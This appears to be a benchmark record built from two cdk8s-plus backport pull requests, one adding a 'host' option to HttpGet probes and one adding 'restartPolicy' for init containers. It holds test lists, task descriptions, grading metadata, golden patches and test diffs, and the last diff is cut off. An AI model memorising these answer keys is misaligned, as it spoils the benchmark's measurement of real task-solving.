volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
Method: Action.fromHttpGet(container: Container, path: string, options: { port?: number; scheme?: ConnectionScheme; host?: string } = {}): k8s.HttpGetAction Location: src/_action.ts Inputs: - **container** – the Container whose port information may be used as a default. - **path** – HTTP request path. - **options** – optional object; may include **port** (number), **scheme** (ConnectionScheme, default HTTP), and new **host** (string) to specify the target hostname/IP for the probe. Outputs: Returns a Kubernetes `HttpGetAction` object with fields `path`, `port`, `scheme`, and the newly added `host` when provided. If `host` is omitted, the field is omitted, allowing the pod IP to be used. Description: Generates a low‑level `HttpGetAction` for a probe, now supporting an explicit `host` override to control the destination address. Interface: HttpGetProbeOptions Location: src/probe.ts Inputs: - **port**?: number – port number for the probe (optional). - **scheme**?: ConnectionScheme – HTTP or HTTPS (default HTTP). - **host**?: string – new optional property specifying the hostname or IP the probe should contact; defaults to the pod IP when omitted. Outputs: N/A (used as a configuration object for creating probes). Description: Options object accepted by `Probe.fromHttpGet`; extended to allow callers (including tests) to set a specific host for the HTTP GET probe.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 2, "num_modified_lines": 14, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.85, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/3818", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding a `host` property to HttpGet probes, and the test patch expects this property to appear in the probe configuration. The golden patch implements exactly that by extending the method signature and returning the host value, matching the test expectations. The tests align with the intended behavior, and there are no signs of unrelated coupling, missing external info, or ambiguous requirements beyond the brief description. Hence the task is solvable and high‑quality.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
0195aef826ef55ed3cdd35db549beced7c625261
2024-04-18 07:16:11
cdk8s-team__cdk8s-plus-4043
diff --git a/src/_action.ts b/src/_action.ts index a1c7bc6c..40bb8d88 100644 --- a/src/_action.ts +++ b/src/_action.ts @@ -21,11 +21,16 @@ export class Action { return { command }; } - public static fromHttpGet(container: Container, path: string, options: { port?: number; scheme?: ConnectionScheme } = { }): k8s.HttpGetAction { + public static fromHttpGet(container: Container, path: string, options: { + port?: number; + scheme?: ConnectionScheme; + host?: string; + } = {}): k8s.HttpGetAction { return { path, port: k8s.IntOrString.fromNumber(options.port ?? container.portNumber ?? 80), scheme: options.scheme ?? ConnectionScheme.HTTP, + host: options.host, }; } -} \ No newline at end of file +} diff --git a/src/probe.ts b/src/probe.ts index e10fc8e8..048e619c 100644 --- a/src/probe.ts +++ b/src/probe.ts @@ -85,6 +85,13 @@ export interface HttpGetProbeOptions extends ProbeOptions { * @default ConnectionScheme.HTTP */ readonly scheme?: ConnectionScheme; + + /** + * The host name to connect to on the container. + * + * @default - defaults to the pod IP + */ + readonly host?: string; } /**
feat(probe): add `host` property to HttpGet probes (#3818) # Backport This will backport the following commits from `k8s-29/main` to `k8s-28/main`: - [feat(probe): add `host` property to HttpGet probes (#3818)](https://github.com/cdk8s-team/cdk8s-plus/pull/3818) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Add host support to HTTP GET probes **Problem** HTTP readiness and liveness probes could only target the pod IP, making it impossible to direct probes to a specific hostname. Users needed a way to specify a custom host for HTTP GET probes. **Root Cause** The probe abstraction and its underlying HTTP GET action did not expose a `host` field, so the generated Kubernetes manifest always omitted it. **Fix / Expected Behavior** - Introduce an optional `host` property in the probe options interface. - Propagate the provided `host` value to the corresponding HTTP GET action. - When `host` is omitted, retain the existing behavior of using the pod IP. - Update type definitions and documentation to describe the new property. - Ensure existing code paths continue to compile and function without changes. **Risk & Validation** - Verify that omitting `host` yields identical manifests to prior versions. - Add or update tests to cover scenarios with and without the `host` option. - Run full type‑checking and integration test suite to confirm no regressions.
4,043
cdk8s-team/cdk8s-plus
diff --git a/test/probe.test.ts b/test/probe.test.ts index 17946ea5..8040b027 100644 --- a/test/probe.test.ts +++ b/test/probe.test.ts @@ -57,6 +57,7 @@ describe('fromHttpGet()', () => { periodSeconds: Duration.seconds(5), successThreshold: 3, timeoutSeconds: Duration.minutes(2), + host: '1.1.1.1', }); // THEN @@ -65,6 +66,7 @@ describe('fromHttpGet()', () => { path: '/hello', port: k8s.IntOrString.fromNumber(5555), scheme: 'HTTP', + host: '1.1.1.1', }, failureThreshold: 11, initialDelaySeconds: 60,
[ "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname" ]
[ "fromCommand", "fromHttpGet", "fromTcpSocket", "can grant permissions on imported", "defaultChild", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "minimal definition", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "defaults", "custom", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "role can bind to imported", "secrets can be added to the service account", "auto mounting token can be disabled", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "can select namespaces", "can select all namespaces", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "targets a deployment that has containers with volume mounts", "default configuration", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Can mutate metadata", "custom configuration", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it" ]
Method: Action.fromHttpGet(container: Container, path: string, options: { port?: number; scheme?: ConnectionScheme; host?: string } = {}) Location: src/_action.ts Inputs: - container – the `Container` whose port may be used as the default when `options.port` is omitted. - path – HTTP request path for the probe. - options – optional object that can contain `port` (number), `scheme` (`ConnectionScheme`), and the newly added `host` (string) to override the target hostname/IP. Outputs: Returns a `k8s.HttpGetAction` object with the fields `path`, `port`, `scheme`, and, if supplied, `host`. Description: Constructs a `HttpGetAction` for a probe, now supporting an explicit `host` override; when omitted the probe targets the pod IP. Interface: HttpGetProbeOptions Location: src/probe.ts Inputs: Extends `ProbeOptions` and includes optional fields: - `scheme?: ConnectionScheme` – the protocol scheme. - **`host?: string`** – the hostname to connect to on the container (defaults to the pod IP if not provided). Outputs: Used as configuration for `fromHttpGet`‑based probes; the `host` value is propagated into the generated `HttpGetAction`. Description: Options object for HTTP GET probes, extended to allow specifying a custom host name/IP for the request.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 2, "num_modified_lines": 14, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.98, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/sqren/backport" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding a `host` property to HttpGet probes, requiring updates to the Action.fromHttpGet method and the HttpGetProbeOptions interface. The test patch verifies that the generated probe includes the new `host` field, matching the intended behavior. No mismatches, external dependencies, naming constraints, or ambiguous specifications are present. Therefore the task is well defined and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
45650d32e941655c00affa4ddf44ec0aaff79545
2024-04-18 07:21:56
cdk8s-team__cdk8s-plus-4045
diff --git a/src/container.ts b/src/container.ts index 28048a6e..e5940b92 100644 --- a/src/container.ts +++ b/src/container.ts @@ -491,6 +491,27 @@ export interface ContainerLifecycle { } +/** + * RestartPolicy defines the restart behavior of individual containers in a pod. + * This field may only be set for init containers, and the only allowed value is "Always". + * For non-init containers or when this field is not specified, + * the restart behavior is defined by the Pod's restart policy and the container type. + * Setting the RestartPolicy as "Always" for the init container will have the following effect: + * this init container will be continually restarted on exit until all regular containers have terminated. + * Once all regular containers have completed, all init containers with restartPolicy "Always" will be shut down. + * This lifecycle differs from normal init containers and is often referred to as a "sidecar" container. + * + * @see https://kubernetes.io/docs/concepts/workloads/pods/sidecar-containers/ + */ +export enum ContainerRestartPolicy { + + /** + * If an init container is created with its restartPolicy set to Always, + * it will start and remain running during the entire life of the Pod. + * For regular containers, this is ignored by Kubernetes. + */ + ALWAYS = 'Always' +} /** * Properties for creating a container. */ @@ -658,6 +679,15 @@ export interface ContainerOpts { * group: 26000 */ readonly securityContext?: ContainerSecurityContextProps; + + /** + * Kubelet will start init containers with restartPolicy=Always in the order with other init containers, + * but instead of waiting for its completion, it will wait for the container startup completion + * Currently, only accepted value is Always + * @see https://kubernetes.io/docs/concepts/workloads/pods/sidecar-containers/ + * @default - no restart policy is defined and the pod restart policy is applied + */ + readonly restartPolicy?: ContainerRestartPolicy; } /** @@ -713,6 +743,11 @@ export class Container { */ public readonly env: Env; + /** + * The restart policy of the container. + */ + public readonly restartPolicy?: ContainerRestartPolicy; + private readonly _command?: readonly string[]; private readonly _args?: readonly string[]; private readonly _ports: ContainerPort[] = []; @@ -759,6 +794,7 @@ export class Container { this.imagePullPolicy = props.imagePullPolicy ?? ImagePullPolicy.ALWAYS; this.securityContext = new ContainerSecurityContext(props.securityContext); this.env = new Env(props.envFrom ?? [], props.envVariables ?? {}); + this.restartPolicy = props.restartPolicy; if (this.portNumber) { this.addPort({ @@ -922,6 +958,7 @@ export class Container { preStop: this._lifecycle.preStop?._toKube(this), } : undefined, resources: resourceRequirements, + restartPolicy: this.restartPolicy, securityContext: this.securityContext._toKube(), }; } diff --git a/src/pod.ts b/src/pod.ts index db6ea332..c7f4ea6b 100644 --- a/src/pod.ts +++ b/src/pod.ts @@ -190,6 +190,10 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, const initContainers: k8s.Container[] = []; for (const cont of this.containers) { + // check if restartPolicy is defined for containers + if (cont.restartPolicy) { + throw new Error(`Invalid container spec: ${cont.name} has non-empty restartPolicy field. The field can only be specified for initContainers`); + } // automatically add volume from the container mount // to this pod so thats its available to the container. for (const mount of cont.mounts) {
feat(container): support `restartPolicy` field (#3812) # Backport This will backport the following commits from `k8s-29/main` to `k8s-28/main`: - [feat(container): support `restartPolicy` field (#3812)](https://github.com/cdk8s-team/cdk8s-plus/pull/3812) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Add support for `restartPolicy` on init containers **Problem** Users cannot declare a restart policy for init containers, limiting the ability to run side‑car‑style init containers that stay alive for the pod’s lifetime. The API also does not enforce that this field is only applicable to init containers, leading to potential misconfiguration. **Root Cause** The container abstraction lacked a `restartPolicy` property and the pod composition logic did not validate its usage. **Fix / Expected Behavior** - Introduce a dedicated enum representing the allowed restart policy value. - Expose an optional `restartPolicy` option on container configuration, defaulting to undefined. - Store the value on the container instance and emit it in the generated Kubernetes manifest. - Enforce at pod synthesis time that `restartPolicy` may only be set on init containers, throwing a clear error otherwise. - Preserve existing behavior for containers without this option. **Risk & Validation** - Ensure that adding the field does not alter manifests for containers that omit it. - Verify that the new validation triggers only for non‑init containers and does not affect valid init container configurations. - Run the full test suite and manually inspect generated pod specs to confirm correct inclusion of the `restartPolicy` field.
4,045
cdk8s-team/cdk8s-plus
diff --git a/test/__snapshots__/container.test.ts.snap b/test/__snapshots__/container.test.ts.snap index 5271e331..c94d5044 100644 --- a/test/__snapshots__/container.test.ts.snap +++ b/test/__snapshots__/container.test.ts.snap @@ -1,5 +1,79 @@ // Jest Snapshot v1, https://goo.gl/fbAQLP +exports[`Container "restartPolicy" property can be used to define restartPolicy 1`] = ` +Array [ + Object { + "apiVersion": "v1", + "kind": "Pod", + "metadata": Object { + "labels": Object { + "cdk8s.io/metadata.addr": "test-Pod-c815bc91", + }, + "name": "test-pod-c890e1b8", + }, + "spec": Object { + "automountServiceAccountToken": false, + "containers": Array [ + Object { + "image": "foo", + "imagePullPolicy": "Always", + "name": "main", + "resources": Object { + "limits": Object { + "cpu": "1500m", + "memory": "2048Mi", + }, + "requests": Object { + "cpu": "1000m", + "memory": "512Mi", + }, + }, + "securityContext": Object { + "allowPrivilegeEscalation": false, + "privileged": false, + "readOnlyRootFilesystem": true, + "runAsNonRoot": true, + }, + }, + ], + "dnsPolicy": "ClusterFirst", + "hostNetwork": false, + "initContainers": Array [ + Object { + "image": "bar", + "imagePullPolicy": "Always", + "name": "init-0", + "resources": Object { + "limits": Object { + "cpu": "1500m", + "memory": "2048Mi", + }, + "requests": Object { + "cpu": "1000m", + "memory": "512Mi", + }, + }, + "restartPolicy": "Always", + "securityContext": Object { + "allowPrivilegeEscalation": false, + "privileged": false, + "readOnlyRootFilesystem": true, + "runAsNonRoot": true, + }, + }, + ], + "restartPolicy": "Always", + "securityContext": Object { + "fsGroupChangePolicy": "Always", + "runAsNonRoot": true, + }, + "setHostnameAsFQDN": false, + "terminationGracePeriodSeconds": 30, + }, + }, +] +`; + exports[`Container "startupProbe" property has defaults if port is provided 1`] = ` Array [ Object { diff --git a/test/container.test.ts b/test/container.test.ts index eccb9ba7..4d570d58 100644 --- a/test/container.test.ts +++ b/test/container.test.ts @@ -1,7 +1,7 @@ import * as cdk8s from 'cdk8s'; import { Size, Testing } from 'cdk8s'; import * as kplus from '../src'; -import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s } from '../src'; +import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s, ContainerRestartPolicy } from '../src'; describe('EnvValue', () => { @@ -536,6 +536,26 @@ describe('Container', () => { expect(container).not.toHaveProperty('startupProbe'); }); + test('"restartPolicy" property can be used to define restartPolicy', () => { + // GIVEN + const chart = Testing.chart(); + const pod = new kplus.Pod(chart, 'Pod'); + + // WHEN + pod.addContainer({ image: 'foo' }); + pod.addInitContainer({ + image: 'bar', + restartPolicy: ContainerRestartPolicy.ALWAYS, + }); + + // THEN + const manifest = Testing.synth(chart); + expect(manifest).toMatchSnapshot(); + const container = manifest[0].spec.initContainers[0]; + + expect(container.restartPolicy).toEqual('Always'); + }); + test('"readiness", "liveness", and "startup" can be used to define probes', () => { // GIVEN const container = new kplus.Container({ diff --git a/test/pod.test.ts b/test/pod.test.ts index 9378cb28..977e64da 100644 --- a/test/pod.test.ts +++ b/test/pod.test.ts @@ -1,7 +1,7 @@ import { Testing, ApiObject, Duration } from 'cdk8s'; import { Node } from 'constructs'; import * as kplus from '../src'; -import { DockerConfigSecret, FsGroupChangePolicy, Probe, k8s, RestartPolicy } from '../src'; +import { DockerConfigSecret, FsGroupChangePolicy, Probe, k8s, RestartPolicy, ContainerRestartPolicy } from '../src'; test('defaults', () => { @@ -1556,4 +1556,13 @@ test('custom termination grace period - minutes', () => { const manifest = Testing.synth(chart); const spec = manifest[0].spec; expect(spec.terminationGracePeriodSeconds).toEqual(120); -}); \ No newline at end 